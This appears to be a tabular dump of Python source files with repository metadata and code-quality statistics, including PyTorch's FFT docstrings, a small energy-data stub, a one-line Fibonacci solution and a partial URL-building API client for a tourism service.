hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3e4bcc35464b2e898be26ac13e2e1fbe14c18c03 | 22,309 | py | Python | torch/fft/__init__.py | jsun94/nimble | e5c899a69677818b1becc58100577441e15ede13 | [
"BSD-3-Clause"
] | 206 | 2020-11-28T22:56:38.000Z | 2022-03-27T02:33:04.000Z | torch/fft/__init__.py | jsun94/nimble | e5c899a69677818b1becc58100577441e15ede13 | [
"BSD-3-Clause"
] | 19 | 2020-12-09T23:13:14.000Z | 2022-01-24T23:24:08.000Z | torch/fft/__init__.py | jsun94/nimble | e5c899a69677818b1becc58100577441e15ede13 | [
"BSD-3-Clause"
] | 28 | 2020-11-29T15:25:12.000Z | 2022-01-20T02:16:27.000Z | import sys
import torch
from torch._C import _add_docstr, _fft # type: ignore
Tensor = torch.Tensor
# Note: This not only adds the doc strings for the spectral ops, but
# connects the torch.fft Python namespace to the torch._C._fft builtins.
fft = _add_docstr(_fft.fft_fft, r"""
fft(input, n=None, dim=-1, norm=None) -> Tensor
Computes the one dimensional discrete Fourier transform of :attr:`input`.
Note:
The Fourier domain representation of any real signal satisfies the
Hermitian property: `X[i] = conj(X[-i])`. This function always returns both
the positive and negative frequency terms even though, for real inputs, the
negative frequencies are redundant. :func:`~torch.fft.rfft` returns the
more compact one-sided representation where only the positive frequencies
are returned.
Args:
input (Tensor): the input tensor
n (int, optional): Signal length. If given, the input will either be zero-padded
or trimmed to this length before computing the FFT.
dim (int, optional): The dimension along which to take the one dimensional FFT.
norm (str, optional): Normalization mode. For the forward transform
(:func:`~torch.fft.fft`), these correspond to:
* ``"forward"`` - normalize by ``1/n``
* ``"backward"`` - no normalization
* ``"ortho"`` - normalize by ``1/sqrt(n)`` (making the FFT orthonormal)
Calling the backward transform (:func:`~torch.fft.ifft`) with the same
normalization mode will apply an overall normalization of ``1/n`` between
the two transforms. This is required to make :func:`~torch.fft.ifft`
the exact inverse.
Default is ``"backward"`` (no normalization).
Example:
>>> import torch.fft
>>> t = torch.arange(4)
>>> t
tensor([0, 1, 2, 3])
>>> torch.fft.fft(t)
tensor([ 6.+0.j, -2.+2.j, -2.+0.j, -2.-2.j])
>>> t = tensor([0.+1.j, 2.+3.j, 4.+5.j, 6.+7.j])
>>> torch.fft.fft(t)
tensor([12.+16.j, -8.+0.j, -4.-4.j, 0.-8.j])
""")
ifft = _add_docstr(_fft.fft_ifft, r"""
ifft(input, n=None, dim=-1, norm=None) -> Tensor
Computes the one dimensional inverse discrete Fourier transform of :attr:`input`.
Args:
input (Tensor): the input tensor
n (int, optional): Signal length. If given, the input will either be zero-padded
or trimmed to this length before computing the IFFT.
dim (int, optional): The dimension along which to take the one dimensional IFFT.
norm (str, optional): Normalization mode. For the backward transform
(:func:`~torch.fft.ifft`), these correspond to:
* ``"forward"`` - no normalization
* ``"backward"`` - normalize by ``1/n``
* ``"ortho"`` - normalize by ``1/sqrt(n)`` (making the IFFT orthonormal)
Calling the forward transform (:func:`~torch.fft.fft`) with the same
normalization mode will apply an overall normalization of ``1/n`` between
the two transforms. This is required to make :func:`~torch.fft.ifft`
the exact inverse.
Default is ``"backward"`` (normalize by ``1/n``).
Example:
>>> import torch.fft
>>> t = torch.tensor([ 6.+0.j, -2.+2.j, -2.+0.j, -2.-2.j])
>>> torch.fft.ifft(t)
tensor([0.+0.j, 1.+0.j, 2.+0.j, 3.+0.j])
""")
fftn = _add_docstr(_fft.fft_fftn, r"""
fftn(input, s=None, dim=None, norm=None) -> Tensor
Computes the N dimensional discrete Fourier transform of :attr:`input`.
Note:
The Fourier domain representation of any real signal satisfies the
Hermitian property: ``X[i_1, ..., i_n] = conj(X[-i_1, ..., -i_n])``. This
function always returns all positive and negative frequency terms even
though, for real inputs, half of these values are redundant.
:func:`~torch.fft.rfftn` returns the more compact one-sided representation
where only the positive frequencies of the last dimension are returned.
Args:
input (Tensor): the input tensor
s (Tuple[int], optional): Signal size in the transformed dimensions.
If given, each dimension ``dim[i]`` will either be zero-padded or
trimmed to the length ``s[i]`` before computing the FFT.
If a length ``-1`` is specified, no padding is done in that dimension.
Default: ``s = [input.size(d) for d in dim]``
dim (Tuple[int], optional): Dimensions to be transformed.
Default: all dimensions, or the last ``len(s)`` dimensions if :attr:`s` is given.
norm (str, optional): Normalization mode. For the forward transform
(:func:`~torch.fft.fftn`), these correspond to:
* ``"forward"`` - normalize by ``1/n``
* ``"backward"`` - no normalization
* ``"ortho"`` - normalize by ``1/sqrt(n)`` (making the FFT orthonormal)
Where ``n = prod(s)`` is the logical FFT size.
Calling the backward transform (:func:`~torch.fft.ifftn`) with the same
normalization mode will apply an overall normalization of ``1/n``
between the two transforms. This is required to make
:func:`~torch.fft.ifftn` the exact inverse.
Default is ``"backward"`` (no normalization).
Example:
>>> import torch.fft
>>> x = torch.rand(10, 10, dtype=torch.complex64)
>>> fftn = torch.fft.fftn(t)
The discrete Fourier transform is separable, so :func:`~torch.fft.fftn`
here is equivalent to two one-dimensional :func:`~torch.fft.fft` calls:
>>> two_ffts = torch.fft.fft(torch.fft.fft(x, dim=0), dim=1)
>>> torch.allclose(fftn, two_ffts)
""")
ifftn = _add_docstr(_fft.fft_ifftn, r"""
ifftn(input, s=None, dim=None, norm=None) -> Tensor
Computes the N dimensional inverse discrete Fourier transform of :attr:`input`.
Args:
input (Tensor): the input tensor
s (Tuple[int], optional): Signal size in the transformed dimensions.
If given, each dimension ``dim[i]`` will either be zero-padded or
trimmed to the length ``s[i]`` before computing the IFFT.
If a length ``-1`` is specified, no padding is done in that dimension.
Default: ``s = [input.size(d) for d in dim]``
dim (Tuple[int], optional): Dimensions to be transformed.
Default: all dimensions, or the last ``len(s)`` dimensions if :attr:`s` is given.
norm (str, optional): Normalization mode. For the backward transform
(:func:`~torch.fft.ifftn`), these correspond to:
* ``"forward"`` - no normalization
* ``"backward"`` - normalize by ``1/n``
* ``"ortho"`` - normalize by ``1/sqrt(n)`` (making the IFFT orthonormal)
Where ``n = prod(s)`` is the logical IFFT size.
Calling the forward transform (:func:`~torch.fft.fftn`) with the same
normalization mode will apply an overall normalization of ``1/n`` between
the two transforms. This is required to make :func:`~torch.fft.ifftn`
the exact inverse.
Default is ``"backward"`` (normalize by ``1/n``).
Example:
>>> import torch.fft
>>> x = torch.rand(10, 10, dtype=torch.complex64)
>>> ifftn = torch.fft.ifftn(t)
The discrete Fourier transform is separable, so :func:`~torch.fft.ifftn`
here is equivalent to two one-dimensional :func:`~torch.fft.ifft` calls:
>>> two_iffts = torch.fft.ifft(torch.fft.ifft(x, dim=0), dim=1)
>>> torch.allclose(ifftn, two_iffts)
""")
rfft = _add_docstr(_fft.fft_rfft, r"""
rfft(input, n=None, dim=-1, norm=None) -> Tensor
Computes the one dimensional Fourier transform of real-valued :attr:`input`.
The FFT of a real signal is Hermitian-symmetric, ``X[i] = conj(X[-i])`` so
the output contains only the positive frequencies below the Nyquist frequency.
To compute the full output, use :func:`~torch.fft.fft`
Args:
input (Tensor): the real input tensor
n (int, optional): Signal length. If given, the input will either be zero-padded
or trimmed to this length before computing the real FFT.
dim (int, optional): The dimension along which to take the one dimensional real FFT.
norm (str, optional): Normalization mode. For the forward transform
(:func:`~torch.fft.rfft`), these correspond to:
* ``"forward"`` - normalize by ``1/n``
* ``"backward"`` - no normalization
* ``"ortho"`` - normalize by ``1/sqrt(n)`` (making the FFT orthonormal)
Calling the backward transform (:func:`~torch.fft.irfft`) with the same
normalization mode will apply an overall normalization of ``1/n`` between
the two transforms. This is required to make :func:`~torch.fft.irfft`
the exact inverse.
Default is ``"backward"`` (no normalization).
Example:
>>> import torch.fft
>>> t = torch.arange(4)
>>> t
tensor([0, 1, 2, 3])
>>> torch.fft.rfft(t)
tensor([ 6.+0.j, -2.+2.j, -2.+0.j])
Compare against the full output from :func:`~torch.fft.fft`:
>>> torch.fft.fft(t)
tensor([ 6.+0.j, -2.+2.j, -2.+0.j, -2.-2.j])
Notice that the symmetric element ``T[-1] == T[1].conj()`` is omitted.
At the Nyquist frequency ``T[-2] == T[2]`` is it's own symmetric pair,
and therefore must always be real-valued.
""")
irfft = _add_docstr(_fft.fft_irfft, r"""
irfft(input, n=None, dim=-1, norm=None) -> Tensor
Computes the inverse of :func:`~torch.fft.rfft`.
:attr:`input` is interpreted as a one-sided Hermitian signal in the Fourier
domain, as produced by :func:`~torch.fft.rfft`. By the Hermitian property, the
output will be real-valued.
Note:
Some input frequencies must be real-valued to satisfy the Hermitian
property. In these cases the imaginary component will be ignored.
For example, any imaginary component in the zero-frequency term cannot
be represented in a real output and so will always be ignored.
Note:
The correct interpretation of the Hermitian input depends on the length of
the original data, as given by :attr:`n`. This is because each input shape
could correspond to either an odd or even length signal. By default, the
signal is assumed to be even length and odd signals will not round-trip
properly. So, it is recommended to always pass the signal length :attr:`n`.
Args:
input (Tensor): the input tensor representing a half-Hermitian signal
n (int, optional): Output signal length. This determines the length of the
output signal. If given, the input will either be zero-padded or trimmed to this
length before computing the real IFFT.
Defaults to even output: ``n=2*(input.size(dim) - 1)``.
dim (int, optional): The dimension along which to take the one dimensional real IFFT.
norm (str, optional): Normalization mode. For the backward transform
(:func:`~torch.fft.irfft`), these correspond to:
* ``"forward"`` - no normalization
* ``"backward"`` - normalize by ``1/n``
* ``"ortho"`` - normalize by ``1/sqrt(n)`` (making the real IFFT orthonormal)
Calling the forward transform (:func:`~torch.fft.rfft`) with the same
normalization mode will apply an overall normalization of ``1/n`` between
the two transforms. This is required to make :func:`~torch.fft.irfft`
the exact inverse.
Default is ``"backward"`` (normalize by ``1/n``).
Example:
>>> import torch.fft
>>> t = torch.arange(5)
>>> t
tensor([0, 1, 2, 3, 4])
>>> T = torch.fft.rfft(t)
>>> T
tensor([10.0000+0.0000j, -2.5000+3.4410j, -2.5000+0.8123j])
Without specifying the output length to :func:`~torch.fft.irfft`, the output
will not round-trip properly because the input is odd-length:
>>> torch.fft.irfft(T)
tensor([0.6250, 1.4045, 3.1250, 4.8455])
So, it is recommended to always pass the signal length :attr:`n`:
>>> torch.fft.irfft(T, t.numel())
tensor([0.0000, 1.0000, 2.0000, 3.0000, 4.0000])
""")
rfftn = _add_docstr(_fft.fft_rfftn, r"""
rfftn(input, s=None, dim=None, norm=None) -> Tensor
Computes the N-dimensional discrete Fourier transform of real :attr:`input`.
The FFT of a real signal is Hermitian-symmetric,
``X[i_1, ..., i_n] = conj(X[-i_1, ..., -i_n])`` so the full
:func:`~torch.fft.fftn` output contains redundant information.
:func:`~torch.fft.rfftn` instead omits the negative frequencies in the
last dimension.
Args:
input (Tensor): the input tensor
s (Tuple[int], optional): Signal size in the transformed dimensions.
If given, each dimension ``dim[i]`` will either be zero-padded or
trimmed to the length ``s[i]`` before computing the real FFT.
If a length ``-1`` is specified, no padding is done in that dimension.
Default: ``s = [input.size(d) for d in dim]``
dim (Tuple[int], optional): Dimensions to be transformed.
Default: all dimensions, or the last ``len(s)`` dimensions if :attr:`s` is given.
norm (str, optional): Normalization mode. For the forward transform
(:func:`~torch.fft.rfftn`), these correspond to:
* ``"forward"`` - normalize by ``1/n``
* ``"backward"`` - no normalization
* ``"ortho"`` - normalize by ``1/sqrt(n)`` (making the real FFT orthonormal)
Where ``n = prod(s)`` is the logical FFT size.
Calling the backward transform (:func:`~torch.fft.irfftn`) with the same
normalization mode will apply an overall normalization of ``1/n`` between
the two transforms. This is required to make :func:`~torch.fft.irfftn`
the exact inverse.
Default is ``"backward"`` (no normalization).
Example:
>>> import torch.fft
>>> t = torch.rand(10, 10)
>>> rfftn = torch.fft.rfftn(t)
>>> rfftn.size()
torch.Size([10, 6])
Compared against the full output from :func:`~torch.fft.fftn`, we have all
elements up to the Nyquist frequency.
>>> fftn = torch.fft.fftn(t)
>>> torch.allclose(fftn[..., :6], rfftn)
True
The discrete Fourier transform is separable, so :func:`~torch.fft.rfftn`
here is equivalent to a combination of :func:`~torch.fft.fft` and
:func:`~torch.fft.rfft`:
>>> two_ffts = torch.fft.fft(torch.fft.rfft(x, dim=1), dim=0)
>>> torch.allclose(rfftn, two_ffts)
""")
irfftn = _add_docstr(_fft.fft_irfftn, r"""
irfftn(input, s=None, dim=None, norm=None) -> Tensor
Computes the inverse of :func:`~torch.fft.rfftn`.
:attr:`input` is interpreted as a one-sided Hermitian signal in the Fourier
domain, as produced by :func:`~torch.fft.rfftn`. By the Hermitian property, the
output will be real-valued.
Note:
Some input frequencies must be real-valued to satisfy the Hermitian
property. In these cases the imaginary component will be ignored.
For example, any imaginary component in the zero-frequency term cannot
be represented in a real output and so will always be ignored.
Note:
The correct interpretation of the Hermitian input depends on the length of
the original data, as given by :attr:`s`. This is because each input shape
could correspond to either an odd or even length signal. By default, the
signal is assumed to be even length and odd signals will not round-trip
properly. So, it is recommended to always pass the signal shape :attr:`s`.
Args:
input (Tensor): the input tensor
s (Tuple[int], optional): Signal size in the transformed dimensions.
If given, each dimension ``dim[i]`` will either be zero-padded or
trimmed to the length ``s[i]`` before computing the real FFT.
If a length ``-1`` is specified, no padding is done in that dimension.
Defaults to even output in the last dimension:
``s[-1] = 2*(input.size(dim[-1]) - 1)``.
dim (Tuple[int], optional): Dimensions to be transformed.
The last dimension must be the half-Hermitian compressed dimension.
Default: all dimensions, or the last ``len(s)`` dimensions if :attr:`s` is given.
norm (str, optional): Normalization mode. For the backward transform
(:func:`~torch.fft.irfftn`), these correspond to:
* ``"forward"`` - no normalization
* ``"backward"`` - normalize by ``1/n``
* ``"ortho"`` - normalize by ``1/sqrt(n)`` (making the real IFFT orthonormal)
Where ``n = prod(s)`` is the logical IFFT size.
Calling the forward transform (:func:`~torch.fft.rfftn`) with the same
normalization mode will apply an overall normalization of ``1/n`` between
the two transforms. This is required to make :func:`~torch.fft.irfftn`
the exact inverse.
Default is ``"backward"`` (normalize by ``1/n``).
Example:
>>> import torch.fft
>>> t = torch.rand(10, 9)
>>> T = torch.fft.rfftn(t)
Without specifying the output length to :func:`~torch.fft.irfft`, the output
will not round-trip properly because the input is odd-length in the last
dimension:
>>> torch.fft.irfftn(T).size()
torch.Size([10, 10])
So, it is recommended to always pass the signal shape :attr:`s`.
>>> roundtrip = torch.fft.irfftn(T, t.size())
>>> roundtrip.size()
torch.Size([10, 9])
>>> torch.allclose(roundtrip, t)
True
""")
hfft = _add_docstr(_fft.fft_hfft, r"""
hfft(input, n=None, dim=-1, norm=None) -> Tensor
Computes the one dimensional discrete Fourier transform of a Hermitian
symmetric :attr:`input` signal.
Note:
:func:`~torch.fft.hfft`/:func:`~torch.fft.ihfft` are analogous to
:func:`~torch.fft.rfft`/:func:`~torch.fft.irfft`. The real FFT expects
a real signal in the time-domain and gives a Hermitian symmetry in the
frequency-domain. The Hermitian FFT is the opposite; Hermitian symmetric in
the time-domain and real-valued in the frequency-domain. For this reason,
special care needs to be taken with the length argument :attr:`n`, in the
same way as with :func:`~torch.fft.irfft`.
Note:
Because the signal is Hermitian in the time-domain, the result will be
real in the frequency domain. Note that some input frequencies must be
real-valued to satisfy the Hermitian property. In these cases the imaginary
component will be ignored. For example, any imaginary component in
``input[0]`` would result in one or more complex frequency terms which
cannot be represented in a real output and so will always be ignored.
Note:
The correct interpretation of the Hermitian input depends on the length of
the original data, as given by :attr:`n`. This is because each input shape
could correspond to either an odd or even length signal. By default, the
signal is assumed to be even length and odd signals will not round-trip
properly. So, it is recommended to always pass the signal length :attr:`n`.
Args:
input (Tensor): the input tensor representing a half-Hermitian signal
n (int, optional): Output signal length. This determines the length of the
real output. If given, the input will either be zero-padded or trimmed to this
length before computing the Hermitian FFT.
Defaults to even output: ``n=2*(input.size(dim) - 1)``.
dim (int, optional): The dimension along which to take the one dimensional Hermitian FFT.
norm (str, optional): Normalization mode. For the forward transform
(:func:`~torch.fft.hfft`), these correspond to:
* ``"forward"`` - normalize by ``1/n``
* ``"backward"`` - no normalization
* ``"ortho"`` - normalize by ``1/sqrt(n)`` (making the Hermitian FFT orthonormal)
Calling the backward transform (:func:`~torch.fft.ihfft`) with the same
normalization mode will apply an overall normalization of ``1/n`` between
the two transforms. This is required to make :func:`~torch.fft.ihfft`
the exact inverse.
Default is ``"backward"`` (no normalization).
Example:
Taking a real-valued frequency signal and bringing it into the time domain
gives Hermitian symmetric output:
>>> import torch.fft
>>> t = torch.arange(5)
>>> t
tensor([0, 1, 2, 3, 4])
>>> T = torch.fft.ifft(t)
>>> T
tensor([ 2.0000+-0.0000j, -0.5000-0.6882j, -0.5000-0.1625j, -0.5000+0.1625j,
-0.5000+0.6882j])
Note that ``T[1] == T[-1].conj()`` and ``T[2] == T[-2].conj()`` is
redundant. We can thus compute the forward transform without considering
negative frequencies:
>>> torch.fft.hfft(T[:3], n=5)
tensor([0., 1., 2., 3., 4.])
Like with :func:`~torch.fft.irfft`, the output length must be given in order
to recover an even length output:
>>> torch.fft.hfft(T[:3])
tensor([0.5000, 1.1236, 2.5000, 3.8764])
""")
ihfft = _add_docstr(_fft.fft_ihfft, r"""
ihfft(input, n=None, dim=-1, norm=None) -> Tensor
Computes the inverse of :func:`~torch.fft.hfft`.
:attr:`input` must be a real-valued signal, interpreted in the Fourier domain.
The IFFT of a real signal is Hermitian-symmetric, ``X[i] = conj(X[-i])``.
:func:`~torch.fft.ihfft` represents this in the one-sided form where only the
positive frequencies below the Nyquist frequency are included. To compute the
full output, use :func:`~torch.fft.ifft`.
Args:
input (Tensor): the real input tensor
n (int, optional): Signal length. If given, the input will either be zero-padded
or trimmed to this length before computing the Hermitian IFFT.
dim (int, optional): The dimension along which to take the one dimensional Hermitian IFFT.
norm (str, optional): Normalization mode. For the backward transform
(:func:`~torch.fft.ihfft`), these correspond to:
* ``"forward"`` - no normalization
* ``"backward"`` - normalize by ``1/n``
* ``"ortho"`` - normalize by ``1/sqrt(n)`` (making the IFFT orthonormal)
Calling the forward transform (:func:`~torch.fft.hfft`) with the same
normalization mode will apply an overall normalization of ``1/n`` between
the two transforms. This is required to make :func:`~torch.fft.ihfft`
the exact inverse.
Default is ``"backward"`` (normalize by ``1/n``).
Example:
>>> import torch.fft
>>> t = torch.arange(5)
>>> t
tensor([0, 1, 2, 3, 4])
>>> torch.fft.ihfft(t)
tensor([ 2.0000+-0.0000j, -0.5000-0.6882j, -0.5000-0.1625j])
Compare against the full output from :func:`~torch.fft.ifft`:
>>> torch.fft.ifft(t)
tensor([ 2.0000+-0.0000j, -0.5000-0.6882j, -0.5000-0.1625j, -0.5000+0.1625j,
-0.5000+0.6882j])
""")
| 40.414855 | 94 | 0.658568 | 3,318 | 22,309 | 4.409885 | 0.086498 | 0.053034 | 0.049207 | 0.028704 | 0.822239 | 0.803923 | 0.79825 | 0.785539 | 0.770913 | 0.751982 | 0 | 0.023888 | 0.211888 | 22,309 | 551 | 95 | 40.488203 | 0.808327 | 0.006724 | 0 | 0.557416 | 0 | 0.07177 | 0.975536 | 0.084044 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.011962 | 0.0311 | 0 | 0.0311 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3e594f11d6b3e167e32e72ad535edab27a157474 | 157 | py | Python | energykit/plugwise/datasource.py | interactiveinstitute/watthappened | 0c7ab7a5ae7f7a0f567c32a524b3c27294d1233f | [
"MIT"
] | null | null | null | energykit/plugwise/datasource.py | interactiveinstitute/watthappened | 0c7ab7a5ae7f7a0f567c32a524b3c27294d1233f | [
"MIT"
] | null | null | null | energykit/plugwise/datasource.py | interactiveinstitute/watthappened | 0c7ab7a5ae7f7a0f567c32a524b3c27294d1233f | [
"MIT"
] | null | null | null | import energykit
# TODO(sander) Connect to a Plugwise stick using its serial device path.
class DataSource(energykit.DataSource, energykit.PubSub):
pass
| 22.428571 | 72 | 0.796178 | 21 | 157 | 5.952381 | 0.857143 | 0.304 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140127 | 157 | 6 | 73 | 26.166667 | 0.925926 | 0.44586 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 8 |
3e8d1a8a0f8da0c82fb940be56e7aacc2e6578f0 | 72 | py | Python | ACM-Solution/FIBON.py | wasi0013/Python-CodeBase | 4a7a36395162f68f84ded9085fa34cc7c9b19233 | [
"MIT"
] | 2 | 2016-04-26T15:40:40.000Z | 2018-07-18T10:16:42.000Z | ACM-Solution/FIBON.py | wasi0013/Python-CodeBase | 4a7a36395162f68f84ded9085fa34cc7c9b19233 | [
"MIT"
] | 1 | 2016-04-26T15:44:15.000Z | 2016-04-29T14:44:40.000Z | ACM-Solution/pi.py | wasi0013/Python-CodeBase | 4a7a36395162f68f84ded9085fa34cc7c9b19233 | [
"MIT"
] | 1 | 2018-10-02T16:12:19.000Z | 2018-10-02T16:12:19.000Z | exec('print(int(((1+5**.5)/2)**int(input())/5**.5+.5));'*int(input()))
| 36 | 71 | 0.486111 | 14 | 72 | 2.5 | 0.5 | 0.171429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 0.027778 | 72 | 1 | 72 | 72 | 0.4 | 0 | 0 | 0 | 0 | 1 | 0.690141 | 0.690141 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
e43a45a510780a871b3f2123bb191aecc9359c55 | 19,914 | py | Python | SIIT_API.py | SiitESTGL/SIIT | 7c67c6b0ff2a0aab423ae9393eef618b5060c281 | [
"MIT"
] | null | null | null | SIIT_API.py | SiitESTGL/SIIT | 7c67c6b0ff2a0aab423ae9393eef618b5060c281 | [
"MIT"
] | null | null | null | SIIT_API.py | SiitESTGL/SIIT | 7c67c6b0ff2a0aab423ae9393eef618b5060c281 | [
"MIT"
] | null | null | null | import requests
def request(url):
r=requests.get(url)
try:
r_json = r.json()
except ValueError:
return ("Error code:" + str(r.status_code))
return (r_json)
class API_client(object):
def __init__(self, key=None,
address= app.config['DEFAULT_SERVER_HOST_ADDRESS']+"/api/v1.0/"
self.key = key
self.address = address
def distance_coord(self, lat = None, lon = None, cat = None, conc = None, dist = None, num_poi=None, order=None):
if lat is None or lon is None:
return ("Error, missing Latitude or Longitude")
if dist is None:
return ("Error, missing distance")
if not isinstance(lat, str):
lat = str(lat)
if not isinstance(lon, str):
lon = str(lon)
if cat is not None:
if not isinstance(cat, str):
cat = str(cat)
if conc is not None:
if not isinstance(conc, str):
conc = str(conc)
if not isinstance(dist, str):
dist = str(dist)
if num_poi is not None:
if not isinstance(num_poi, str):
num_poi = str(num_poi)
if order is not None:
if not isinstance(order, str):
order = str(order)
if cat and conc and num_poi and order:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&numpoi="+num_poi+"&order="+order+"&cat="+cat+"&conc="+conc+"&dist="+dist+"&key="+self.key
elif cat and num_poi and order:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&numpoi="+num_poi+"&order="+order+"&cat="+cat+"&dist="+dist+"&key="+self.key
elif cat and num_poi:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&numpoi="+num_poi+"&cat="+cat+"&dist="+dist+"&key="+self.key
elif cat and order:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&order="+order+"&cat="+cat+"&dist="+dist+"&key="+self.key
elif cat and conc:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&cat="+cat+"&conc="+conc+"&dist="+dist+"&key="+self.key
elif cat:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&cat="+cat+"&dist="+dist+"&key="+self.key
elif conc and num_poi and order:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&numpoi="+num_poi+"&order="+order+"&conc="+conc+"&dist="+dist+"&key="+self.key
elif conc and num_poi:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&numpoi="+num_poi+"&conc="+conc+"&dist="+dist+"&key="+self.key
elif conc and order:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&order="+order+"&conc="+conc+"&dist="+dist+"&key="+self.key
elif conc:
